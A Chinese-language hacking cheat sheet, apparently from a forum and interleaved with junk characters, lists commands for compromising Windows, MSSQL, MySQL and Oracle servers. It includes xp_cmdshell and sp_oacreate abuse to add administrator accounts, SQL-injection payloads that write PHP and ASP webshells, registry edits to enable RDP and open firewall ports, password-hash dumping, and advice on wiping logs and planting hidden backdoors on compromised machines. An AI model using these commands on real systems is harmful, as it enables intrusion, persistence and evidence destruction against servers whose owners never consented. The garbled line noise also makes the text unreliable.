, s5 w* A) g' h G% m& t! X1.net user administrator /passwordreq:no9 ], A5 \+ Z" D1 P& v& B5 F
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
: b- v# e Y x9 @$ y2.比较巧妙的建克隆号的步骤
9 ]2 G7 N# `$ |. R% h0 u- i4 `先建一个user的用户8 k( v) U* ? d" B
然后导出注册表。然后在计算机管理里删掉9 E& Z1 {. S( s$ |% K# j& S
在导入,在添加为管理员组
$ y: b0 w* @5 Q9 c" R4 F3.查radmin密码' j% d1 J$ o0 p; V/ E1 T( O
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
- e4 R& W1 ?: o4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
" E }6 r1 q: o; U% N建立一个"services.exe"的项
3 D9 F) l( m0 {) _再在其下面建立(字符串值)& `9 |+ b# H5 s% e( S
键值为mu ma的全路径0 ~% y V7 L ?- H* C% e
5.runas /user:guest cmd* X4 l4 E2 u8 J. ?
测试用户权限!; H1 H6 z1 F( ]( H
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?3 _! B S& |5 S8 z/ J. r, a6 E
7.入侵后漏洞修补、痕迹清理,后门置放:8 O$ q. _8 P8 P1 c* {" s& r
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门1 ~7 ^1 b& [% Z2 m5 t
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c& T& E1 H% D" O' h; ~9 L
1 N! h+ E: Y7 f% \0 s
for example' d9 f3 j2 c) l! ~) r
% c$ _0 l# ~* \& ^
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
* L1 a1 x3 X! v7 a. K, Q: S5 O- U
* ]/ L; F( A2 e" c6 E+ Edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
/ A, A' h& g- I0 X& k6 B9 _% R" F3 I1 _3 m- b! I1 A
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了3 p$ U9 E+ W6 o" T/ i Q* f
如果要启用的话就必须把他加到高级用户模式
- y6 x# G3 q' L) }9 Z: r: l可以直接在注入点那里直接注入
# A+ W+ [5 L4 b& D7 J2 zid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--+ Y8 M6 U" m* O! o
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
0 O* ]; f- }9 a. B或者, g" k1 C% {0 K: V
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'% {0 Z4 L; l6 I2 @* T, s( R
来恢复cmdshell。
; u, C2 M$ f3 j4 b6 d. N4 q. c- ~8 B, `/ f7 w& [5 a! v
分析器8 j Z+ l* ~# x/ U) a V$ l0 D
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
, }: B: L* Y0 Q$ F" |" t; U然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
' i, o! D6 _, Q. D7 \- S10.xp_cmdshell新的恢复办法 p4 q9 @* k b7 U1 {- V+ P. l6 @; x
xp_cmdshell新的恢复办法) p2 \% t ^! a7 h. c/ |& S
扩展储存过程被删除以后可以有很简单的办法恢复:
! r; B! ~0 Q: ?! x删除5 c1 }# U2 P& g1 a4 n: K
drop procedure sp_addextendedproc
/ d' X; T7 c' d. [9 t3 t3 sdrop procedure sp_oacreate
$ @" A7 N( w- W7 V7 g& `: K) Rexec sp_dropextendedproc 'xp_cmdshell') C2 k, Q0 y" k1 O
' H) P+ t8 d8 f/ f$ M" N恢复
4 f5 Q' p9 o/ u3 y8 \$ Vdbcc addextendedproc ("sp_oacreate","odsole70.dll")8 w& I7 M+ T6 y( b& R
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
. F* h: {; y# Q: y2 s# f' ]( @ p, E, h2 C
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
7 [% ^" B4 ?+ G' g7 Y4 S! t9 D+ \. F1 B3 }: n
-----------------------------
. B+ D; a3 h" ^2 i+ p' r* s
4 D% \) P! K& t2 H/ \" v4 H删除扩展存储过过程xp_cmdshell的语句:6 }- W& S2 w9 f7 C+ O
exec sp_dropextendedproc 'xp_cmdshell'
# J4 e7 x4 {2 ?4 K& [+ w3 Y2 B, ~( N" m6 D* O+ }* H
恢复cmdshell的sql语句9 g% W" @6 p$ H, J4 B
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
1 H# t8 h0 Q# a% C; b! h, P4 T
9 h* r' o3 x5 c J+ p
开启cmdshell的sql语句$ i+ V9 s' N0 }; l# p( r6 l( n+ I& d
& p2 ]+ d; V1 U+ Eexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'4 l6 |& J( S: S& N+ D4 x
' Y1 Q% P z( O0 f/ ^判断存储扩展是否存在5 F* }' L' ^; B9 z7 C' v
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell': G, c! H. O$ r( l" R& k1 h
返回结果为1就ok
6 Q' H9 |$ y2 k! r9 z, C
/ n) y8 y8 H. d4 j0 G0 h9 L( e8 F: q恢复xp_cmdshell
: \3 P n4 {+ {exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell', L# E, F) ~8 r/ S" f
返回结果为1就ok
[7 | [& D7 ?" _; s7 G8 F" j% `" B, h! h$ D
否则上传xplog7.0.dll
5 O3 H' ^$ r8 ~: zexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'" j# F1 U5 |5 Z: f5 w8 y1 Q
- v8 s- ?4 D& Z1 S: z堵上cmdshell的sql语句 I- S' [0 i5 u( }" B: i
sp_dropextendedproc "xp_cmdshel/ v# c0 V ?8 g' D; [
-------------------------) {5 I- e8 v( Y
清除3389的登录记录用一条系统自带的命令:
4 W v9 P+ ?7 k9 `* l. j% v% V' Xreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f3 A) F5 X3 \* Z% B4 @
" q6 N/ E+ h/ c k5 e
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
5 O8 M; w& [. c+ Q在 mysql里查看当前用户的权限) Y1 S8 D. ^6 S( N; ~
show grants for
2 M, a1 A& z1 @0 L5 Z1 }" z* t
3 E- r1 `4 M- r以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
: m5 J0 X/ Y( u% q; w. t# z8 [
# ?* @ T* ]( r: g+ j! K' z, _, o: p1 l& o1 ?' V" i
Create USER 'itpro'@'%' IDENTIFIED BY '123';
, c# f9 Y, I' H# s i; l. i# t5 t8 W: g8 C
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION1 |$ q) j8 k2 b) @( a6 R$ U
2 q% ]) P0 z& n& Y+ c8 e5 ?& W+ SMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
% G+ I4 M' D r% U% F/ n' }+ L
' V. h/ x, p, ]0 OMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;$ a' Y2 M8 u1 P1 R! O
7 }& I7 @. Z0 ~4 o5 I( D& k6 t
搞完事记得删除脚印哟。& ]* y# f; X0 C! ^6 v2 v G
# S- z- Z- Y& k$ P. hDrop USER 'itpro'@'%';
6 X% P$ A" X! d* M7 f$ K4 E9 P, k
8 s2 O) u" J/ i* k$ u7 O6 ^' nDrop DATABASE IF EXISTS `itpro` ;
+ _5 q0 R' f) j& T( q. s* Y' q' y( H) w2 @4 I! |# |" @$ ~
当前用户获取system权限
; K+ k1 x' y$ nsc Create SuperCMD binPath= "cmd /K start" type= own type= interact" H) Y& R8 L5 G
sc start SuperCMD' s- L: X6 c, q& [) y) y
程序代码* n/ ]' K$ @. _+ _$ v- o
<SCRIPT LANGUAGE="VBScript">
" G# i$ C. d6 \- i' p3 l' D) lset wsnetwork=CreateObject("WSCRIPT.NETWORK")3 T6 a4 m# f* e# G9 ~ v
os="WinNT://"&wsnetwork.ComputerName
/ A* e7 C0 |1 i1 m4 _- @! L" HSet ob=GetObject(os)
$ y" }1 g- a1 O L4 ~Set oe=GetObject(os&"/Administrators,group")+ F& p! x8 Z2 \4 ~* g" A9 Z/ g$ e
Set od=ob.Create("user","nosec")
( O0 o" q. k1 qod.SetPassword "123456abc!@#"
. B& Y2 p# n; W8 p, M* ]od.SetInfo: Y; K# r0 \5 o
Set of=GetObject(os&"/nosec",user)
' _2 A) J7 J/ goe.add os&"/nosec"& Q3 v) p( K) U4 B
</Script>
2 ?" [6 c; C0 e; r6 s: Z* w. p<script language=javascript>window.close();</script>
4 a7 o' x8 }1 P" J
2 b: a9 W# @; z+ u# T+ |# C2 Q, t H, m9 I
1 R! R- n/ M7 d7 ?; A+ W0 {; [4 B) x
突破验证码限制入后台拿shell
+ T& U, u5 |) o& S. i1 k) x程序代码( B$ |2 i2 K0 V0 \, y8 v
REGEDIT4
. O5 Y* }% L2 p# m[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 6 `! m1 D+ ] p' l$ `# s
"BlockXBM"=dword:000000009 X2 t2 f9 C! O4 u! g1 y0 d
0 N$ G3 `6 a# C! A: f' _; I保存为code.reg,导入注册表,重器IE# q" a3 U/ k F; n9 W5 R
就可以了
# M2 o. b: \' |. R; s5 Z& w' B$ runion写马
}( a# C* ]4 l$ C4 f6 H程序代码
/ j7 K1 x! `' e/ T: [www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
) H* Y% I: {7 T% g, C! u/ M+ Q& d- H4 ^8 ~. ~1 W$ P( `* H& x
应用在dedecms注射漏洞上,无后台写马
! }- P. w, @! b& Kdedecms后台,无文件管理器,没有outfile权限的时候5 @ G$ |9 o+ y; |
在插件管理-病毒扫描里
4 {* G8 p: W. v9 r) {写一句话进include/config_hand.php里
: O! O3 z* X$ g$ D" {/ h. z程序代码( X" @4 p# a& k2 n6 @: R1 o/ Z( S
>';?><?php @eval($_POST[cmd]);?>' O3 Q: X/ |- ~, e; G" r
2 \" P$ z4 i( o: g. m- z9 A& F/ |9 \( P
) V; A8 \4 W! Y7 C
如上格式
/ H. D7 |* S4 I: @" p( r3 e, y: e* s; O6 [* ^- u }: W: U
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解, m m7 g# L# I9 p
程序代码/ h; S8 t: M( r4 ^4 t$ n
select username,password from dba_users;; o. X& B4 V! `$ A' C; C( h* K
- S* B) [( c; T( J7 v$ ?
! E. t( v( W6 S: ?# p" f0 cmysql远程连接用户7 u; n6 A' Z. i) p+ {
程序代码2 g/ ^8 U- X2 `8 Y
1 V# o' ?& M9 `" C' mCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';" h: I/ i' c2 R1 r% R6 b- V
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION4 A6 s3 X1 t* s7 J
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
3 J$ K3 Q: _% J/ p* j- nMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
; {$ n. E, N9 F. M
6 X' [4 k) b8 f/ y, M, e8 o3 k3 G; H- H
# h; n# ?7 A8 ^: l; a& E- h
- }6 X+ Y% n z' ^echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
- e( z0 P' v9 L9 o3 J( T2 O; C6 z, N4 E- U" @1 ~3 d1 U3 X0 [+ ^
1.查询终端端口
0 E# g# s t0 V: g0 d: d" j2 P2 x; P9 W" Q) a# l: L
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
( L# \! f5 K8 ]+ H' F6 v
0 k) U/ o$ n7 K S1 I通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"5 C2 U* C/ R" B. ~" Y
type tsp.reg
4 j4 C. k+ Y$ E: T
* v& z# x7 [- A+ [2.开启XP&2003终端服务* a! b5 a% ]5 Z9 ^
% h( @6 G- i6 [4 L# Z5 I
0 I" K2 I( Y& I" S) p. p2 w
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f6 I4 {. W5 b( N5 Y [
. B2 E0 q3 w \( a' R' I6 U/ E8 L/ q! X1 X. w
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f) n! W# j" R$ }1 W# n* _' m6 U
* y. H: q( x8 j3 g7 i0 }$ e
3.更改终端端口为20008(0x4E28)* j/ N1 J: N5 K2 Y4 s
?, S5 O. }8 A6 o QREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f5 m* {$ W5 m% i2 s/ B% `: v% A* B
" r) h6 t; j& J' _$ `' Z- ^; @
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f* f; Z; w- E( }1 U: N& \; o Y
- v1 n6 y' R( i/ n
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
* x7 I3 l! p1 v1 p m/ X6 _+ I0 g% P
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f5 Y4 {$ S- @# k
f# E. v' p( p: ^, ~1 g% {
o7 S8 n* ?" `5.开启Win2000的终端,端口为3389(需重启)
1 \' x& t) d" s9 O9 y! [+ G# b: u7 X9 u, B- i5 V
echo Windows Registry Editor Version 5.00 >2000.reg
- Y% ~3 b9 Q8 E* lecho. >>2000.reg
' P- \& f! Q7 c) ?echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg ( Y2 Z Y2 Y, G+ S! W! x; e- I
echo "Enabled"="0" >>2000.reg 1 j3 {& W- t) P* o" U& ^( v
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
) |, \& T& s3 O4 Fecho "ShutdownWithoutLogon"="0" >>2000.reg
- I% g" [% p6 P$ ]) i" Techo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
1 L. O, h2 h: c Aecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
# s" T7 E; y" q# G! Y0 Secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
% i6 A8 Q- s+ Xecho "TSEnabled"=dword:00000001 >>2000.reg & z% o' c& r- G2 z8 F# f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
& J8 K% s1 {7 \3 Oecho "Start"=dword:00000002 >>2000.reg " ?* h/ ?, V+ E
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg ' S R& v3 {# U
echo "Start"=dword:00000002 >>2000.reg # _/ h, X/ N4 o# O! ~
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 0 B) {: f4 {" P9 I
echo "Hotkey"="1" >>2000.reg 4 U! d+ Q4 n! F: _
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
9 Y! ~- ?* T8 s( w2 K- h" A0 ?echo "ortNumber"=dword:00000D3D >>2000.reg
- x4 l5 l/ P l; H5 ~echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg : L' b# c' ?1 s1 a
echo "ortNumber"=dword:00000D3D >>2000.reg
! ^- g' u# Q6 y# [% s0 A5 J1 ^9 \
# g x8 K- z! c" {* R& ?& @6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)4 g- v8 F! \2 Y$ r; e
' [* J5 v2 o) K' m% h
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf0 j7 ]; [' V, z; B
(set inf=InstallHinfSection DefaultInstall)* r: [' ?: q T! s* a* I
echo signature=$chicago$ >> restart.inf2 k( G: h5 d9 R! r- q( j/ w
echo [defaultinstall] >> restart.inf
5 R+ F" R; O8 P( ~4 A- w2 W) M7 R! Orundll32 setupapi,%inf% 1 %temp%\restart.inf* P/ _+ K0 D7 T3 f# _
* L) d) V* T8 h% o) H- b
* R2 I8 s7 t! i: b& R! F |; [+ ~7.禁用TCP/IP端口筛选 (需重启)
/ {" Y* ]+ `( ^; n0 Y: Y6 q. A
" l/ }! ?% _$ u4 wREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f) {9 X3 b5 H8 e! r* e4 u
- U4 _5 e- ]7 J/ W8.终端超出最大连接数时可用下面的命令来连接
7 m% n6 h, w0 ]
9 G5 g- H( o! A2 Nmstsc /v:ip:3389 /console
$ C8 C2 Z& {4 J- a. N3 R2 B5 ]
, i: k9 u5 l) i8 `9.调整NTFS分区权限
4 l) Y% H1 F! ~/ l* V! s9 \# M+ o# E; y- O
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
" K% _# B1 s% ^1 i
. }4 O) A" W2 d) ^; Vcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)7 q J9 ^ C) J g- W) F. d
3 A! E$ o2 T- ~( g0 d3 d
------------------------------------------------------
9 Y$ s/ M7 K/ u3389.vbs
B- N$ T/ M. }$ A! dOn Error Resume Next! ?$ ?5 B( {/ y6 D# e3 i3 K
const HKEY_LOCAL_MACHINE = &H80000002
7 s5 L2 I) a7 y( e- }strComputer = "."5 T1 E7 t/ t- Z
Set StdOut = WScript.StdOut4 Z2 H# d |, @ c$ F7 ^0 t( C
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_: q) c9 R" j/ R9 d0 j
strComputer & "\root\default:StdRegProv")4 a6 i v7 h! M9 ^& g7 ]8 F
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server" g- ~% h' d, f* f% G3 H
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
3 A6 O' }2 ]& E# c0 P. n' \strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
" l/ C+ s. H* T4 _! _! Soreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath' [1 _ _0 P$ o0 {0 }, @2 |
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
6 ^$ k% \) R- P0 j; l5 S, ystrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"* {! D7 |( y% P8 T; \- d
strValueName = "fDenyTSConnections"
6 F( S9 R2 L% V& Z0 v% U, ]dwValue = 0
! k1 [+ Q% v$ k5 Y( y- ^oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue$ s# Q1 U! ^+ d9 V- x7 K+ R
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
/ z# U( t" V% O+ e4 D, dstrValueName = "ortNumber"
6 e) X* Y0 U/ N& [$ a6 U' m0 }! pdwValue = 33897 ?; a0 H4 v# Y6 C' D- a
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
. l$ r$ z% ?/ r+ l9 BstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp". [5 ~( T+ s5 ^ c. f3 t
strValueName = "ortNumber"8 q% B0 J" Z9 b
dwValue = 33893 D' L7 L- f8 V6 j" l- m
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue/ v% f+ y0 Q+ L$ \- L
Set R = CreateObject("WScript.Shell") ( t X D/ r& a d/ d# _
R.run("Shutdown.exe -f -r -t 0") 3 C5 `4 ~4 c$ ^) z5 T/ i
. }& D1 q; i# ? ?8 i3 l删除awgina.dll的注册表键值
c t) i5 y& C: a v) K5 r0 {& C! K程序代码
+ x) w) x& X- I$ c2 Q7 q
+ F# O( G( J- n* {: Hreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f5 y0 t* {1 j, L( Y( v
: V7 i. u6 u2 m2 g" N
; d) y* Q% S# c2 \' l2 }
c* _' l# L1 v9 A: f( [ h/ m3 p2 Y; G
程序代码3 Y0 @" l+ ^. \4 N4 `# p
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash5 Z5 q& b3 d. `9 r" |2 \/ G3 E8 h
: L3 L- n: N" G$ X( ?1 y设置为1,关闭LM Hash
5 l/ G! p5 _0 g$ }& Q9 [7 R4 K0 k0 H" U
数据库安全:入侵Oracle数据库常用操作命令! E; b1 h9 }3 O: _- ?2 j/ H
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。0 h* v. i H# R
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
( A7 `7 K7 E4 _) ]( O$ H2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
, l7 @. E a n3、SQL>connect / as sysdba ;(as sysoper)或
# m6 m3 Q( R* D0 U6 K& Y( ?0 Pconnect internal/oracle AS SYSDBA ;(scott/tiger)
$ |6 h* M! o: A) S- V/ r- a- K3 Oconn sys/change_on_install as sysdba;
' [# P: K% i* r( x/ Y4、SQL>startup; 启动数据库实例9 a4 D2 q0 M1 {7 Z8 X# s2 q
5、查看当前的所有数据库: select * from v$database;; V) Z# M# R3 X
select name from v$database;8 H/ c) s6 ?$ T5 I* z4 H4 R
6、desc v$databases; 查看数据库结构字段
' H( s& a) C! O& m% D9 g9 P7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:; A3 b, J' v4 U; ]; H9 K: I3 J
SQL>select * from V_$PWFILE_USERS;& Q& r" _& g9 Q0 N! w' d
Show user;查看当前数据库连接用户
C& I' D% ^# Q9 H4 @/ w8、进入test数据库:database test;
/ i/ s5 I. t P& v- F9、查看所有的数据库实例:select * from v$instance;# u) T' y6 y+ N2 h' r8 ^
如:ora9i
5 Y+ c. x5 I! B2 {$ \4 L! y10、查看当前库的所有数据表:
' b1 _) R6 j+ B. K3 OSQL> select TABLE_NAME from all_tables;
4 a' `8 Z9 @ |8 fselect * from all_tables;; Z P6 h0 W9 O6 X# U
SQL> select table_name from all_tables where table_name like '%u%';, b( ]0 C: m0 P3 o8 e+ o
TABLE_NAME
) x0 m1 B& w; w! v' C( d------------------------------7 r \! A# D6 i: y- j
_default_auditing_options_
2 {8 |& ?+ ]& X9 G& C& R11、查看表结构:desc all_tables;
$ l0 m; J2 L6 B+ n. |12、显示CQI.T_BBS_XUSER的所有字段结构:
5 H! g) x* u' {5 U Qdesc CQI.T_BBS_XUSER;& _* K& |/ x& n$ E* v# h
13、获得CQI.T_BBS_XUSER表中的记录:! |: U* Y6 D; N2 o
select * from CQI.T_BBS_XUSER;- k0 o3 G5 X9 l7 D; ?- ~ x
14、增加数据库用户:(test11/test) Y4 Q& x& Y3 s. j) s4 s3 @
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
4 e1 M S% M) J( \, C15、用户授权:
7 ~9 T0 }; ~ e; C | A7 ?1 Mgrant connect,resource,dba to test11;# z) y* H4 s t8 B& \
grant sysdba to test11;
+ I3 z9 F0 K, N, y4 {$ |commit;
( X C! A! v% u# h) @5 n/ r! ^! `16、更改数据库用户的密码:(将sys与system的密码改为test.)
. H: D0 ^8 }9 a: n" falter user sys indentified by test;! L1 v8 |1 U Z2 F( k' m- Q
alter user system indentified by test;& t/ b; [" c5 ]6 @+ }
. C7 p. j8 K- I ?7 Q
applicationContext-util.xml
( D5 }3 g: N% ?" happlicationContext.xml" w6 G6 ?3 F! R1 Z0 T
struts-config.xml9 R2 _* c4 X. h; a: m! I
web.xml: N& M6 D |5 c' R
server.xml2 T8 N( ]2 d0 A6 I, F3 L$ A! S
tomcat-users.xml
6 Q' K" W, H, X1 V, P/ E& I' khibernate.cfg.xml! h: C+ @* x, O' A' f2 O3 e: c7 I
database_pool_config.xml
1 E8 J: L4 }9 D7 ]$ J9 V( y I) d- k5 I6 ]
1 ?' A% j8 m: R6 a n5 { I\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
5 n) I; A# I6 Q# r+ h, T\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini3 P( B0 p! V3 i8 ?0 K5 J6 l+ c
\WEB-INF\struts-config.xml 文件目录结构0 Q O! a6 z! G( w5 q
' \4 P+ z3 E) E5 e
spring.properties 里边包含hibernate.cfg.xml的名称
" ^ o0 Z/ `1 u4 t
- M7 v4 K/ O# _: T8 O' ?
& A, K2 ]) `4 X3 ?3 E7 K' h8 sC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml j1 Z( N* e8 K
# q2 F; S$ E5 P( e1 ?; P
如果都找不到 那就看看class文件吧。。! D# t" x; m3 G5 ^( N
) m+ c! }4 a: \% I+ `
测试1:
9 ?0 \5 p9 h+ ^5 S# oSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1* t) E; V. w( m: J. y9 M4 d
* y/ B# Y9 L4 m% D' N/ [0 a8 `$ Y
测试2:
( v1 I, R2 n! r( T, A8 ]& x+ t- q% g! H$ P
create table dirs(paths varchar(100),paths1 varchar(100), id int)% g0 C& P# s( B7 u# Y
6 c1 _' ?" ^% Y6 c& O) {) M
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
1 ~8 m3 K7 X5 |! p; t6 P M& \+ i) M1 x7 \) E- r; }
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
8 y: z7 C8 m& H
2 U3 n$ p% x2 K( \查看虚拟机中的共享文件: d% l" h3 _. ~% t9 ]0 l( `( n
在虚拟机中的cmd中执行
" s- s- c" b# Z6 N6 v1 f- z* I1 d\\.host\Shared Folders \+ |8 _4 t: V9 L8 N4 F
: I" y% X/ ~7 y; _( e
cmdshell下找终端的技巧
O0 m$ t) {4 O找终端: $ U2 y5 d; e- _, s
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
' d5 m8 p9 J. ]8 @- I 而终端所对应的服务名为:TermService ]! d `/ U' j; ^7 ^) P4 w9 [& Y& I
第二步:用netstat -ano命令,列出所有端口对应的PID值! , s; }; w! S: d7 d
找到PID值所对应的端口
/ t* l+ K; T5 I% `3 j8 ~5 E* ^% J
. J& Q' L. {, ]" ^2 H: x7 q查询sql server 2005中的密码hash
5 r2 G! B# h0 \ S* W6 |SELECT password_hash FROM sys.sql_logins where name='sa'2 s0 I9 G& I# X% g% n8 [" G5 w
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a4 c( c% o, r( N* g
access中导出shell
% X$ u3 v: ~! G! k# ?, s; p) O1 e% L1 @$ \5 D9 ?
中文版本操作系统中针对mysql添加用户完整代码:
' j4 N# y9 H8 K7 w, w7 g$ i+ s _+ R! F: z, N, b
use test;9 I3 [! k* A) S" I1 Y7 d
